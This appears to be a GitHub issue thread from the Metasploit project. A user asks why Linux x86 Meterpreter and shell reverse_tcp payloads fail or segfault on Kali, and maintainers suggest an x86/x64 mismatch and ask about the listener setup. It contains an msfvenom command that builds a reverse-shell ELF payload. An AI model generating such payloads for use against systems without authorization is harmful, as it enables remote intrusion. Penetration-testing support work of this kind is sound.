### ISSUE TITLE
Meterpreter and Shell payloads Linux fail

### ISSUE THREAD

**Issue by re8el** [rapid7/metasploit-framework#8760]
hi i'm on a kali 4.9.0-kali4-amd64 4.9.25 full updated and i just cannot get a payload linux/x86 to work... 

running multi/handler payload linux/x86/meterpreter/reverse_tcp lhost and port setup i only get has a connection the message " date-time Encoded stage with x86/shikata_ga_nai"... 

to generate da payload i use msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip lport=8443 -f elf > shell.elf and chmod +x and run it

If i try the pyload linux/x86/shell/reverse_tcp and generate the elf with msfvenom when try to run it, i get " segmentation faul  " error message.

any ideas ?

**Comment by cbrnrd** [comment]
Usually a segfault occurs when a x86 ELF binary is run in a x64 platform (and vice-versa). try using a x64 payload instead of an x86 one

**Comment by busterb** [comment]
How do you have the listener setup? That's half of the information, and missing here. The stager payload does nothing without a proper listener setup too.

**Comment by re8el** [comment]
Hi,

yes the multi/handler is properly setup for the payload.

From what cbnrd tells it seems that could be it... i runned the elf on the x64 kali....

have to test again...

**Comment by re8el** [comment]
open

**Comment by busterb** [comment]
Sorry, there isn't any information here about how your listener is setup. We're not going to be able to help without that. Please drop by #metasploit on IRC for support questions. Thanks.
